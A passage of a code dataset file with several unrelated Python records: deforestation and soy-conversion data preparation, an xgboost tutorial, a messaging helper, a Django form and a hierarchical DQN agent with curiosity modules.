data_df['ce_tf_d_' + year] + data_df['ce_v_d_' + year]\n data_df['tot_f_d_' + year] = data_df['ce_f_d_' + year] + data_df['amp_f_d_' + year] + data_df['amnp_f_d_' + year]\n\n# Repeat for soy conversion \nyears = range(2001, 2015)\nf2s_stubs = ['amp_tf_f2s_', 'amnp_tf_f2s_', 'ce_tf_f2s_',\n 'amp_v_f2s_', 'amnp_v_f2s_', 'ce_v_f2s_']\nf2s_cols = [prefix + str(year) for prefix in f2s_stubs \\\n for year in years]\ndata_df.loc[:, f2s_cols] = data_df[f2s_cols].fillna(0)\nfor year in range(2001, 2015): \n year = str(year)\n data_df['amp_f_f2s_' + year] = data_df['amp_tf_f2s_' + year] + data_df['amp_v_f2s_' + year]\n data_df['amnp_f_f2s_' + year] = data_df['amnp_tf_f2s_' + year] + data_df['amnp_v_f2s_' + year]\n data_df['ce_f_f2s_' + year] = data_df['ce_tf_f2s_' + year] + data_df['ce_v_f2s_' + year]\n data_df['tot_f_f2s_' + year] = data_df['ce_f_f2s_' + year] + data_df['amp_f_f2s_' + year] + data_df['amnp_f_f2s_' + year]\n\n#==============================================================================\n# Create ending \"forest\" (forest or non-forest veg) classes\n#==============================================================================\ndata_df['amp_f_a_2016'] = data_df['amp_tf_a_2016'] + data_df['amp_v_a_2016']\ndata_df['amnp_f_a_2016'] = data_df['amnp_tf_a_2016'] + data_df['amnp_v_a_2016']\ndata_df['ce_f_a_2016'] = data_df['ce_tf_a_2016'] + 
data_df['ce_v_a_2016']\ndata_df['tot_f_a_2016'] = data_df['ce_f_a_2016'] + data_df['amp_f_a_2016'] + data_df['amnp_f_a_2016']\n\n#de_cols = [col for col in data_df.columns if 'tot_f_d' in col]\n#data_df[de_cols].describe()\n\n#==============================================================================\n# ID different treatment categories\n#==============================================================================\ndata_df['amha'] = data_df['amprodesha'] + data_df['amnonprodesha']\ndata_df.loc[:, 'amazon'] = 0\ndata_df.loc[data_df['amha']>0, 'amazon'] = 1\ndata_df.loc[:, 'cerrado'] = 0\ndata_df.loc[data_df['cerha']>0, 'cerrado'] = 1\n\ndata_df.loc[:, 'prodes'] = 0\ndata_df.loc[data_df['amprodesha']>1, 'prodes'] = 1\n\ndata_df['in_lam'] = (data_df['dist_aml'] < 0).astype(int)\ndata_df['in_amb'] = (data_df['dist_amb'] < 0).astype(int)\ndata_df['biome_legal'] = data_df['in_amb'] * 10 + data_df['in_lam']\n\n#==============================================================================\n# Calculate total soy area\n#==============================================================================\ndata_df['tot_s_a_2001'] = data_df['am_s_a_2001'] + data_df['ce_s_a_2001']\ndata_df['tot_s_a_2007'] = data_df['am_s_a_2007'] + data_df['ce_s_a_2007']\ndata_df['tot_s_a_2015'] = data_df['am_s_a_2015'] + data_df['ce_s_a_2014']\n\n##==============================================================================\n## Calculate total forest to soy conversion\n##==============================================================================\n#for y in range(2001, 2014):\n#    data_df.loc[:, 'tot_f2s_a_' + str(y)] = data_df['amnp_f2s_a_' + str(y)] + \\\n#        data_df['amp_f2s_a_' + str(y)] + data_df['ce_f2s_a_' + str(y)]\n\n#==============================================================================\n# Calculate total forest areas and percent deforestation\n#==============================================================================\ndef calc_area(data_df, region, lu):\n    prefix = region + '_' + lu\n    dif_cols = [col for col in data_df if prefix + '_d_' in col]\n    cumdif_df = data_df[dif_cols].cumsum(axis = 1)\n    area_df = pd.DataFrame()\n    for col in dif_cols:\n        area_df[col.replace(prefix + '_d_', prefix + '_a_')] = data_df[prefix + '_a_2000'] - cumdif_df[col]\n    area_df[prefix + '_a_2000'] = data_df[prefix + '_a_2000']\n    area_df = area_df.sort_index(axis = 1)\n    area_df = area_df.drop(prefix + '_a_2000', axis = 1) \n#    isPositive(area_df[prefix + '_a_2015'])\n    data_df = pd.merge(data_df, area_df, left_index = True, right_index = True, \n                       how = 'left')\n#    ptcl_df = -area_df.pct_change(axis = 1)*100\n#    ptcl_df = ptcl_df.rename(columns = {col: col.replace(prefix + '_a_', prefix + '_p_') for \\\n#        col in ptcl_df.columns})\n#    ptcl_df = ptcl_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n#        for col in ptcl_df.columns})\n##    ptcl_df = ptcl_df.drop(prefix + '_p_1999', axis = 1)\n#    data_df = pd.merge(data_df, ptcl_df, left_index = True, right_index = True, \n#                       how = 'left')\n    return data_df\n\n\ndef back_calc_area(data_df, region, lu):\n    prefix = region + '_' + lu\n    dif_cols = [col for col in data_df if prefix + '_d_' in col]\n    col_map = {col: col.replace('_d_', '_a_')[:-4] + \\\n               str(int(col[-4:])-1) for col in dif_cols}\n    cumdif_df = data_df[dif_cols].sort_index(ascending = False, \n                                             axis = 1).cumsum(axis = 1)\n    area_df = pd.DataFrame()\n    for col in dif_cols:\n        area_df[col_map[col]] = data_df[prefix + '_a_2016'] \\\n            + cumdif_df[col]\n    isPositive(area_df[prefix + '_a_2015'])\n    data_df = pd.merge(data_df, 
area_df, left_index = True, \n right_index = True, \n how = 'left')\n return data_df\n\ndata_df = back_calc_area(data_df, 'tot', 'f')\ndata_df = back_calc_area(data_df, 'amp', 'f')\ndata_df = back_calc_area(data_df, 'amnp', 'f')\ndata_df = back_calc_area(data_df, 'ce', 'f')\n\n#def add_diff_cols(df, prefix):\n# dif_df = -df.diff(axis = 1)\n# dif_df = dif_df.rename(columns = {col: prefix + '_d_' + col[-4:] \\\n# for col in dif_df.columns})\n# dif_df = dif_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n# for col in dif_df.columns})\n# pdif_df = df.pct_change(axis = 1) * 100\n# pdif_df = pdif_df.rename(columns = {col: prefix + '_p_' + col[-4:] \\\n# for col in pdif_df.columns})\n# pdif_df = pdif_df.rename(columns = {col: col[:-4] + str(int(col[-4:]) - 1) \\\n# for col in pdif_df.columns})\n# df = pd.merge(df, dif_df, left_index = True, right_index = True, \n# how = 'left')\n# df = pd.merge(df, pdif_df, left_index = True, right_index = True, \n# how = 'left')\n# return df\n\n#==============================================================================\n# Drop properties with less than 10ha of forest\n#==============================================================================\ndata_df = data_df.loc[data_df['tot_f_a_2000']>10]\n\n#==============================================================================\n# ID soy properties \n#==============================================================================\ndata_df.loc[:, 'soy_2001'] = (data_df['tot_s_a_2001'] > 25).astype(int)\ndata_df.loc[:, 'soy_2007'] = (data_df['tot_s_a_2007'] > 25).astype(int)\ndata_df.loc[:, 'soy_2015'] = (data_df['tot_s_a_2015'] > 25).astype(int)\ndata_df.loc[:, 'newsoy'] = ((data_df['soy_2015']==1) & (data_df['soy_2007']==0)).astype(int)\n\n#soy_cols = [col for col in data_df.columns if 'tot_s_a' in col]\n#soy_df = data_df[soy_cols]\n#soy_df = ((soy_df>25).sum(axis = 1))>1\n#soy_df = soy_df.rename('soy').astype(int)\n#data_df = pd.merge(data_df, pd.DataFrame(soy_df), left_index = True, right_index = True, \n# how = 'left')\n\n#==============================================================================\n# Add random identifier to reduce data size, randomize before output\n#==============================================================================\nnp.random.seed(123)\ndata_df.loc[:, 'random'] = np.random.uniform(size = data_df.shape[0])\ndata_df.to_csv(out_dir + 'wide.csv')\n\n\n\n##==============================================================================\n## Compare property sizes (to justify sample size)\n##==============================================================================\n#prep_df.loc[prep_df['soy']==1, 'propareaha'].describe()\n#prep_df.loc[prep_df['soy']==0, 'propareaha'].describe()\n#\n#prep_df.loc[prep_df['soy']==1, 'propareaha'].quantile(0.05)\n#prep_df.loc[prep_df['soy']==0, 'propareaha'].quantile(0.01)\n#\n#prep_df.loc[(prep_df['soy']==1) & (prep_df['propareaha']>50), 'propareaha'].sum() / prep_df.loc[(prep_df['soy']==1), 'propareaha'].sum()\n#(prep_df['propareaha']<50).sum() / prep_df.shape[0]\n## ie, 99.9% of total area in soy properties is maintained with this restriction, but it cuts the size of the dataset nearly in half\n\n#==============================================================================\n# Convert dataset to long\n#==============================================================================\n#del am_f_a_df\n#del am_ptcl_df\n#del am_s_a_df\n#del am_s_df\n#del ce_f_a_df\n#del ce_ptcl_df\n#del ce_s_a_df\n#del ce_s_df\n#del tot_f_df\n#del 
tot_s_a_df\n#del tot_s_df\n#del data_df\ngc.collect()\n\ndata_df = data_df.reset_index()\ndrop_stubs = ['amnp_v_d_', 'amp_v_d_', 'ce_v_d_',\n 'amnp_tf_d_', 'amp_tf_d_', 'ce_tf_d_',\n 'amnp_tf_f2s_', 'amp_tf_f2s_', 'ce_tf_f2s_',\n 'amnp_v_f2s_', 'amp_v_f2s_', 'ce_v_f2s_']\ndrop_cols = [col for col in data_df.columns for stub in drop_stubs if stub in col]\ndrop_cols.extend(['ce_v_a_2016', 'amnp_v_a_2016', 'amp_v_a_2016',\n 'ce_tf_a_2016', 'amnp_tf_a_2016', 'amp_tf_a_2016'])\ndata_df = data_df.drop(drop_cols, axis = 1)\nstubs = ['amp_f_f2s_', 'amnp_f_f2s_', 'ce_f_f2s_', 'tot_f_f2s_',\n 'amp_f_a_', 'amnp_f_a_', 'ce_f_a_', 'tot_f_a_',\n# 'amp_f_p_', 'amnp_f_p_', 'ce_f_p_', 'tot_f_p_',\n 'amp_f_d_', 'amnp_f_d_', 'ce_f_d_', 'tot_f_d_',\n 'soydouble', 'soysingle', 'soycotton',\n 'precip_', 'temp_']\n\nlong_df = pd.wide_to_long(data_df, stubnames = stubs, i = 'propid', \n j = 'year')\ndel data_df\ngc.collect()\n\nchange_stubs = [stub for stub in stubs if '_'==stub[-1:]]\nlong_df = long_df.rename(columns = {col: col[:-1] for col in change_stubs})\nlong_df = long_df.reset_index()\nlong_df['year'] = long_df['year'].astype(int)\n\n# =============================================================================\n# Fill temp nulls from arcgis\n# =============================================================================\nlong_df['temp'] = long_df['temp'].replace(-9999, np.nan)\n\n#==============================================================================\n# Save year 2000 forest areas for matching / normalizing\n#==============================================================================\nwide_vars = ['propid', 'tot_f_a', 'amp_f_a', 'amnp_f_a', 'ce_f_a']\nyear = 2000\nlong_df['year'] = long_df['year'].astype(int)\ndata = long_df.loc[long_df['year']==year, wide_vars]\ndata = data.rename(columns = {col: col + '_' + str(year) for col in \\\n data.columns if col!='propid'})\nlong_df = long_df.merge(data, left_on = 'propid', right_on = 'propid', how = 'left')\n\n#==============================================================================\n# Deforestation outcomes\n#==============================================================================\nprefixes = ['tot', 'amp', 'amnp', 'ce']\nfor prefix in prefixes:\n long_df.loc[:, prefix + '_f_sf'] = long_df[prefix + '_f_d'] / \\\n long_df[prefix + '_f_a_2000']\n long_df.loc[:, prefix + '_f_sp'] = long_df[prefix + '_f_d'] / long_df['propareahafinal']\n long_df.loc[:, prefix + '_f_f2s_sf'] = long_df[prefix + '_f_f2s'] / \\\n long_df[prefix + '_f_a_2000']\n long_df.loc[:, prefix + '_f_f2s_sp'] = long_df[prefix + '_f_f2s'] / long_df['propareahafinal']\n\n#==============================================================================\n# Save year 2001-2006 outcomes for matching / normalizing\n#==============================================================================\nwide_vars = ['propid', 'tot_f_sf', 'tot_f_f2s_sf', 'tot_f_a',\n 'precip', 'temp']\n# 'propid', 'tot_f_d', 'tot_f_f2s_a', 'tot_f2s_sp', 'tot_f_sp', 'temp', 'precip']\nyear_list = range(2001, 2007)\nfor year in year_list:\n data = long_df.loc[long_df['year']==year, wide_vars]\n data = data.rename(columns = {col: col + '_' + str(year) for col in \\\n data.columns if col!='propid'})\n long_df = long_df.merge(data, left_on = 'propid', right_on = 'propid', how = 'left')\n\n#==============================================================================\n# Additional calculations\n#==============================================================================\nlong_df.loc[:, 'tot_hys_s'] = 
(long_df['soydouble'] + long_df['soycotton']) / \\\n (long_df['soydouble'] + long_df['soycotton'] + long_df['soysingle'])\nlong_df.loc[:, 'border'] = ((long_df['amdist']<20) & (long_df['cerdist']<20)).astype(int)\n \n#==============================================================================\n# Treatment indicators\n#==============================================================================\nlong_df['soy'] = ((long_df['soy_2007']) | (long_df['soy_2001'])).astype(int)\nlong_df['late'] = (long_df['year']>2006).astype(int)\nlong_df['soym'] = ((long_df['soy']==1) & (long_df['amazon']==1) & \\\n (long_df['late']==1)).astype(int)\nlong_df['late_amazon'] = ((long_df['late']==1) & (long_df['amazon']==1)).astype(int)\nlong_df['late_soy'] = ((long_df['late']==1) & (long_df['soy']==1)).astype(int)\nlong_df = long_df.set_index(['propid', 'year'])\n\n# =============================================================================\n# Data cleaning\n# =============================================================================\nlong_df[['suit', 'verysuit']] = long_df[['suit', 'verysuit']].fillna(0)\n\n##==============================================================================\n## Testing\n##==============================================================================\nshr_vars = ['tot_f_sf', 'tot_f_sp', 'tot_f_f2s_sf', 'tot_f_f2s_sp', 'tot_hys_s']\nfor shr_var in shr_vars:\n isShare(long_df[shr_var], 0.2)\n long_df.loc[long_df[shr_var]<0, shr_var] = 0\n long_df.loc[long_df[shr_var]>1, shr_var] = 1\n\narea_vars = ['tot_f_a', 'amnp_f_a', 'amp_f_a', 'ce_f_a']\nfor area_var in area_vars:\n isPositive(long_df[area_var], 10)\n long_df.loc[long_df[area_var]<0, area_var] = 0\n\n##==============================================================================\n## Spatial weights calculation\n##==============================================================================\n##test = long_df.loc[(slice(None), 2005), :]\n##test_kdtree = ps.cg.KDTree(test[['x_centroid', \n## 'y_centroid']].as_matrix())\n##test_w = ps.weights.Distance.KNN(test_kdtree, k=3, p=2)\n##test_w.transform = 'r'\n##test['lags'] = ps.lag_spatial(test_w, test['tot_f2s_sf'])\n##test.lags.describe()\n#kdtree = ps.cg.KDTree(long_df.loc[(slice(None), 2000), ['x_centroid', \n# 'y_centroid']].as_matrix())\n#w = ps.weights.Distance.KNN(kdtree, k=5, p=2)\n#w.transform = 'r' # row standardize\n#lag_vars = ['tot_f_a', 'tot_f2s_a', 'tot_f_sf', 'tot_f2s_sf', 'tot_f_sp', 'tot_f2s_sp']\n##renamed_lag_vars = [lag_var + '_lag' for lag_var in lag_vars]\n##long_df = long_df.reindex(columns = long_df.columns.tolist() + renamed_lag_vars)\n#for lag_var in lag_vars:\n# for year in range(2000, 2017):\n# long_df.loc[(slice(None), year), lag_var + '_slag'] = \\\n# ps.lag_spatial(w, long_df.loc[(slice(None), year), lag_var])\n\n# =============================================================================\n# Add data for soy expansion summary stats\n# =============================================================================\nload_cols = ['propertyid']\nload_cols.extend([col for col in header.columns if \\\n (col.startswith('soyam15newde20') | col.startswith('soycer14newde20') | \\\n col.startswith('soyam07newde20') | col.startswith('soycer07newde20'))])\n\nsoy_df = data_df = pd.read_csv(data_csv, engine = 'python', na_values = 'na',\n usecols = load_cols)\n\nsoy_df = soy_df.set_index('propertyid')\ndef rename_col(col):\n col = col.replace('soy', '')\n col = col.replace('newde', '_')\n col = col.replace('cer', 'ce')\n return col\nsoy_df = 
soy_df.rename(columns = rename_col)\ncols_early = [col for col in soy_df.columns if (col[2:4]=='07') & ('2000' not in col)]\nconv_early = soy_df[cols_early].sum(axis = 1)\n#cols_late = [col for col in soy_df.columns if ((col[2:4]=='14') | (col[2:4]=='15')) & (('2000' not in col) & ('2015' not in col))]\ncols_late = [col for col in soy_df.columns if ((col[2:4]=='14') | (col[2:4]=='15')) & any(str(y) in col for y in list(range(2007, 2015)))]\nconv_late = soy_df[cols_late].sum(axis = 1)\n\n\n\nconv_df = pd.DataFrame({'soyconv_late': conv_late, 'soyconv_early': conv_early})\n#long_df = long_df.merge(conv_df, left_index = True, right_index = True, how = 'left')\nconv_df.to_csv(out_dir + 'soy_conv.csv')\n\n#==============================================================================\n# Save out file\n#==============================================================================\nlong_df = long_df.sort_values('random')\nlong_df.to_csv(out_dir + 'long.csv')\n#long_df.to_stata(out_dir + 'long.dta')\n\n","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":29108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358101658","text":"#%%\n# ---------------------------------\n# Preparing the data etc.\n# ----------------------------------\nimport numpy as np\nimport pandas as pd\n\n# train_x is the training data, train_y is the target variable, test_x is the test data\n# They are kept as pandas DataFrame and Series. (They can also be kept as numpy arrays.)\n\ntrain = pd.read_csv('../input/sample-data/train_preprocessed.csv')\ntrain_x = train.drop(['target'], axis=1)\ntrain_y = train['target']\ntest_x = pd.read_csv('../input/sample-data/test_preprocessed.csv')\n\n# Split the training data into training and validation sets\nfrom sklearn.model_selection import KFold\n\nkf = KFold(n_splits=4, shuffle=True, random_state=71)\ntr_idx, va_idx = list(kf.split(train_x))[0]\ntr_x, va_x = train_x.iloc[tr_idx], train_x.iloc[va_idx]\ntr_y, va_y = train_y.iloc[tr_idx], train_y.iloc[va_idx]\n\n#%%\n# -----------------------------------\n# Using xgboost\n# -----------------------------------\nimport xgboost as xgb\nfrom sklearn.metrics import log_loss\n\n# Convert the features and the target variable into xgboost's data structure\ndtrain = xgb.DMatrix(tr_x, label=tr_y)\ndvalid = xgb.DMatrix(va_x, label=va_y)\ndtest = xgb.DMatrix(test_x)\n\n# Set the hyperparameters\nparams = {'objective': 'binary:logistic', 'silent': 1, 'random_state': 71}\nnum_round = 50\n\n# Run the training\n# The validation data is also passed to the model so we can monitor how the score changes as training progresses.\n# Prepare the training and validation data as a watchlist\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\nmodel = xgb.train(params, dtrain, num_round, evals=watchlist)\n\n# Check the score on the validation data\nva_pred = model.predict(dvalid)\nscore = log_loss(va_y, va_pred)\nprint(f'logloss: {score:.4f}')\n\n# Predict (outputs the probability of being 1, not a two-valued prediction)\npred = model.predict(dtest)\n\n#%%\n# -----------------------------------\n# Monitoring the score on the training and validation data\n# -----------------------------------\n# Monitoring is done with logloss. early_stopping_rounds is set to 20 rounds.\n
params = {'objective': 'binary:logistic', 'silent': 1, 'random_state': 71,\n          'eval_metric': 'logloss'}\nnum_round = 500\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\nmodel = xgb.train(params, dtrain, num_round, evals=watchlist,\n                  early_stopping_rounds=20)\n\n# Predict with the optimal number of decision trees\npred = model.predict(dtest, ntree_limit=model.best_ntree_limit)\n","sub_path":"ch04/ch04-02-run_xgb.py","file_name":"ch04-02-run_xgb.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423421382","text":"from Port.client import Client\nfrom Damasanj.apps import DamasanjConfig as Dc \ntoken = Dc.Sid\nbama = Client(token)\n\nclass dama :\n    def send(data,rname):\n        if data['type'].lower() == 'text':\n            \n            sendp(data['body'],rname,'TEXT')\n\n            bama.send_message(data)\n\n\ndef sendp(d,r,t):\n    print (\"(send %s) <%s>>> %s\" %(t,r,d.splitlines()[0])) \n    for q in d.splitlines():\n        sp = ' '*len(\"(send %s) <%s>>> %s\" %(t,r,d.splitlines()[0]))\n        print (\"%s%s\" %(sp,q))\n    print ('\\n\\n\\n\\n')","sub_path":"SDimServer/Receiving/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433255962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django import forms\nimport datetime\nfrom django.utils.html import format_html\nfrom django.utils.encoding import force_text\nfrom django.utils.safestring import mark_safe\n\n\nclass Select1(forms.Select):\n\n    def render_option(self, selected_choices, option_value, option_label):\n        html = super(Select1, self).render_option(selected_choices, option_value, option_label)\n        html_style= html.replace('>', ' style=\"background: #f0f0f0; color: #000;\">', 1)\n        return html_style\n\n\nclass TabelDialogForm(forms.Form):\n    department = forms.ChoiceField(required=True, initial=1,\n                                   widget=Select1(attrs={'style': 'background: #f0f0f0; color: #000;'})\n                                   )\n    year_num = forms.IntegerField(required=True,\n                                  min_value=2000,\n                                  max_value=2100,\n                                  widget=forms.NumberInput(attrs={'style': 'background: #f0f0f0; color: #000;'}\n                                  )\n\n\n                                  )\n    month_num = forms.ChoiceField(required=True,\n                                  choices=((1,1),(2,2),(3,3),(4,4),(5,5),(6,6),(7,7),(8,8), (9,9),(10,10),(11,11),(12,12),),\n                                  widget=Select1(attrs={\n                                      'style': 'background: #f0f0f0; color: #000;'}\n                                  )\n                                  )\n\n    is_staffer = forms.BooleanField(initial=True, required=False)\n    is_first_half_of_month = forms.BooleanField(initial=False, required=False)\n\n    def __init__(self, *args, **kwargs):\n        # #self.base_fields['department'].choices = DEPARTMENTS\n        departments = kwargs.pop('departments', {})\n        super(TabelDialogForm, self).__init__(*args, **kwargs)\n        self.fields['department'].choices = departments\n        self.fields['year_num'].initial = cur_year()\n        self.fields['month_num'].initial = cur_month()\n\n\ndef cur_year():\n    return datetime.datetime.now().year\n\n\ndef cur_month():\n    return datetime.datetime.now().month","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71175638","text":"import numpy as np\nimport torch\nfrom rl.model import DDQN_Model, ICM_Model\nfrom rl.memory import Memory\nfrom rl.per import PERMemory\nfrom torch.nn.functional import mse_loss, cross_entropy, smooth_l1_loss, softmax\nimport settings as sett\nimport itertools\nimport os\n\n\nclass 
EHDQN:\n def __init__(self, state_dim, tau, action_dim, gamma, n_subpolicy, max_time, hidd_ch, lam, lr, eps,\n eps_decay, eps_sub, eps_sub_decay, beta, bs, target_interval, train_steps, max_memory, max_memory_sub,\n conv, gamma_macro, reward_rescale, n_proc, per=False, norm_input=True, logger=None):\n \"\"\"\n :param state_dim: Shape of the state\n :param float tau: Weight for agent loss\n :param gamma_macro: Discount for macro controller\n :param int action_dim: Number of actions\n :param float gamma: Discount for sub controller\n :param int n_subpolicy: Number of sub policies\n :param int max_time: Number of steps for each sub policy\n :param int hidd_ch: Number of hidden channels\n :param float lam: Scaler for ICM reward\n :param float lr: Learning rate\n :param float eps: Eps greedy chance for macro policy\n :param float eps_decay: Epsilon decay computed as eps * (1 - eps_decay) each step\n :param float eps_sub: Eps greedy change for sub policies\n :param float eps_sub_decay: Epsilon decay for sub policy computed as eps * (1 - eps_decay) each step\n :param float beta: Weight for loss of fwd net vs inv net\n :param int bs: Batch size\n :param int target_interval: Number of train steps between target updates\n :param int train_steps: Number of training iterations for each call\n :param int max_memory: Max memory\n :param bool conv: Use or not convolutional networks\n :param bool per: Use or not prioritized experience replay\n :param int max_time: Maximum steps for sub policy\n \"\"\"\n\n # Parameters\n self.logger = logger\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.target_interval = target_interval\n self.lr = lr\n self.bs = bs\n # Macro Policy parameters\n self.eps = eps\n self.eps_decay = 1 - eps_decay\n self.gamma_macro = gamma_macro\n # Sub policy parameters\n self.n_subpolicy = n_subpolicy\n self.tau = tau\n self.eps_sub = eps_sub\n self.eps_sub_decay = 1 - eps_sub_decay\n self.gamma = gamma\n # ICM parameters\n self.beta = beta\n self.lam = lam\n\n self.n_proc = n_proc\n self.selected_policy = np.full((self.n_proc,), fill_value=None)\n self.macro_state = np.full((self.n_proc,), fill_value=None)\n self.max_time = max_time\n self.train_steps = train_steps\n self.reward_rescale = reward_rescale\n self.norm_input = norm_input\n self.per = per\n self.curr_time = np.zeros((self.n_proc, ), dtype=np.int)\n self.macro_reward = np.zeros((self.n_proc,), dtype=np.float)\n self.target_count = np.zeros((self.n_subpolicy,), dtype=np.int)\n self.counter_macro = np.zeros((self.n_subpolicy,), dtype=np.int)\n self.counter_policies = np.zeros((self.n_subpolicy, self.action_dim), dtype=np.int)\n self.macro_count = 0\n\n if self.per:\n memory = PERMemory\n else:\n memory = Memory\n\n # Create Policies / ICM modules / Memories\n self.macro = DDQN_Model(state_dim, n_subpolicy, conv=conv, hidd_ch=hidd_ch)\n self.macro_target = DDQN_Model(state_dim, n_subpolicy, conv=conv, hidd_ch=hidd_ch)\n self.macro_target.update_target(self.macro)\n self.macro_memory = Memory(max_memory)\n self.macro_opt = torch.optim.Adam(self.macro.parameters(), lr=self.lr * 4 if self.per else self.lr)\n self.memory, self.policy, self.target, self.icm, self.policy_opt, self.icm_opt = [], [], [], [], [], []\n for i in range(n_subpolicy):\n # Create sub-policies\n self.policy.append(DDQN_Model(state_dim, action_dim, conv=conv, hidd_ch=hidd_ch, macro=self.macro).to(sett.device))\n self.target.append(DDQN_Model(state_dim, action_dim, conv=conv, hidd_ch=hidd_ch, macro=self.macro).to(sett.device))\n 
self.target[-1].update_target(self.policy[-1])\n self.memory.append(memory(max_memory_sub))\n\n # Create ICM modules\n self.icm.append(ICM_Model(self.state_dim, self.action_dim, conv).to(sett.device))\n\n # Create sub optimizers\n self.policy_opt.append(torch.optim.Adam(self.policy[i].parameters(), lr=self.lr))\n self.icm_opt.append(torch.optim.Adam(self.icm[i].parameters(), lr=1e-3))\n\n # Send macro to correct device\n self.macro = self.macro.to(sett.device)\n self.macro_target = self.macro_target.to(sett.device)\n\n def save(self, i):\n if not os.path.isdir(sett.SAVEPATH):\n os.makedirs(sett.SAVEPATH)\n torch.save(self.macro.state_dict(), os.path.join(sett.SAVEPATH, 'Macro_%s.pth' % i))\n for sub in range(self.n_subpolicy):\n torch.save(self.policy[sub].state_dict(), os.path.join(sett.SAVEPATH, 'Sub_%s_%s.pth' % (sub, i)))\n torch.save(self.icm[sub].state_dict(), os.path.join(sett.SAVEPATH, 'Icm_%s_%s.pth' % (sub, i)))\n\n def load(self, path, i):\n self.macro.load_state_dict(torch.load(os.path.join(path, 'Macro_%s.pth' % i), map_location=sett.device))\n for sub in range(self.n_subpolicy):\n self.policy[sub].load_state_dict(torch.load(os.path.join(path, 'Sub_%s_%s.pth' % (sub, i)), map_location=sett.device))\n self.icm[sub].load_state_dict(torch.load(os.path.join(path, 'Icm_%s_%s.pth' % (sub, i)), map_location=sett.device))\n\n def act(self, obs, deterministic=False):\n x = torch.from_numpy(obs).float().to(sett.device)\n if self.norm_input:\n x /= 255\n\n for i, sel_policy, curr_time in zip(range(self.n_proc), self.selected_policy, self.curr_time):\n if sel_policy is None or curr_time == self.max_time:\n if sel_policy is not None and not deterministic:\n # Store non terminal macro transition\n self.macro_memory.store_transition(self.macro_state[i], obs[i], sel_policy, self.macro_reward[i], False)\n self.macro_reward[i] = 0\n\n # Pick macro action\n self.selected_policy[i] = self.pick_policy(x[i][None], deterministic=deterministic)\n assert isinstance(self.selected_policy[i], int)\n self.curr_time[i] = 0\n if not deterministic:\n self.macro_state[i] = obs[i]\n\n self.counter_macro[sel_policy] += 1\n\n eps = max(0.01, self.eps_sub) if not deterministic else 0.01\n sel_pol = np.unique(self.selected_policy)\n sel_indices = [(self.selected_policy == i).nonzero()[0] for i in sel_pol]\n action = -np.ones((self.n_proc,), dtype=np.int)\n for policy_idx, indices in zip(sel_pol, sel_indices):\n action[indices] = self.policy[policy_idx].act(x[indices], eps=eps, backbone=self.macro)\n self.counter_policies[policy_idx, action[indices]] += 1\n\n self.curr_time += 1 # Is a vector\n return action\n\n def pick_policy(self, obs, deterministic=False):\n eps = max(0.01, self.eps) if not deterministic else 0.01\n policy = self.macro.act(obs, eps=eps)\n return policy\n\n def set_mode(self, training=False):\n for policy in self.policy:\n policy.train(training)\n self.macro.train(training)\n self.selected_policy[:] = None\n self.curr_time[:] = 0\n\n def process_reward(self, reward):\n # Rescale reward if a scaling is provided\n if self.reward_rescale != 0:\n if self.reward_rescale == 1:\n reward = np.sign(reward)\n elif self.reward_rescale == 2:\n reward = np.clip(reward, -1, 1)\n else:\n reward *= self.reward_rescale\n return reward\n\n def store_transition(self, s, s1, a, reward, is_terminal):\n reward = self.process_reward(reward)\n\n for i, sel_policy in enumerate(self.selected_policy):\n # Store sub policy experience\n self.memory[sel_policy].store_transition(s[i], s1[i], a[i], reward[i], is_terminal[i])\n 
self.macro_reward[i] += reward[i]\n\n # Store terminal macro transition\n if is_terminal[i]:\n self.macro_memory.store_transition(self.macro_state[i], s1[i], sel_policy, self.macro_reward[i], is_terminal[i])\n self.macro_reward[i] = 0\n self.selected_policy[i] = None\n\n def update(self):\n for i in range(self.train_steps):\n self._update()\n if self.logger is not None:\n self.logger.step += 1\n\n def _update(self):\n # First train each sub policy\n self.macro_opt.zero_grad() # To allow cumulative gradients on backbone part\n\n for i in range(self.n_subpolicy):\n memory = self.memory[i]\n if len(memory) < self.bs * 100:\n continue\n\n policy = self.policy[i]\n target = self.target[i]\n icm = self.icm[i]\n policy_opt = self.policy_opt[i]\n icm_opt = self.icm_opt[i]\n\n if self.per:\n state, new_state, action, reward, is_terminal, idxs, w_is = memory.sample(self.bs)\n reduction = 'none'\n self.logger.log_scalar(tag='Beta PER %i' % i, value=memory.beta)\n else:\n state, new_state, action, reward, is_terminal = memory.sample(self.bs)\n reduction = 'mean'\n\n if self.norm_input:\n state = np.array(state, dtype=np.float) / 255\n new_state = np.array(new_state, dtype=np.float) / 255\n\n state = torch.tensor(state, dtype=torch.float).detach().to(sett.device)\n new_state = torch.tensor(new_state, dtype=torch.float).detach().to(sett.device)\n action = torch.tensor(action).detach().to(sett.device)\n reward = torch.tensor(reward, dtype=torch.float).detach().to(sett.device)\n is_terminal = 1. - torch.tensor(is_terminal, dtype=torch.float).detach().to(sett.device)\n\n # Augment rewards with curiosity\n curiosity_rewards = icm.curiosity_rew(state, new_state, action)\n reward = (1 - 0.01) * reward + 0.01 * self.lam * curiosity_rewards\n\n # Policy loss\n q = policy.forward(state, macro=self.macro)[torch.arange(self.bs), action]\n max_action = torch.argmax(policy.forward(new_state, macro=self.macro), dim=1)\n y = reward + self.gamma * target.forward(new_state, macro=self.macro)[torch.arange(self.bs), max_action] * is_terminal\n policy_loss = smooth_l1_loss(input=q, target=y.detach(), reduction=reduction).mean(-1)\n\n # ICM Loss\n phi_hat = icm.forward(state, action)\n phi_true = icm.phi_state(new_state)\n fwd_loss = mse_loss(input=phi_hat, target=phi_true.detach(), 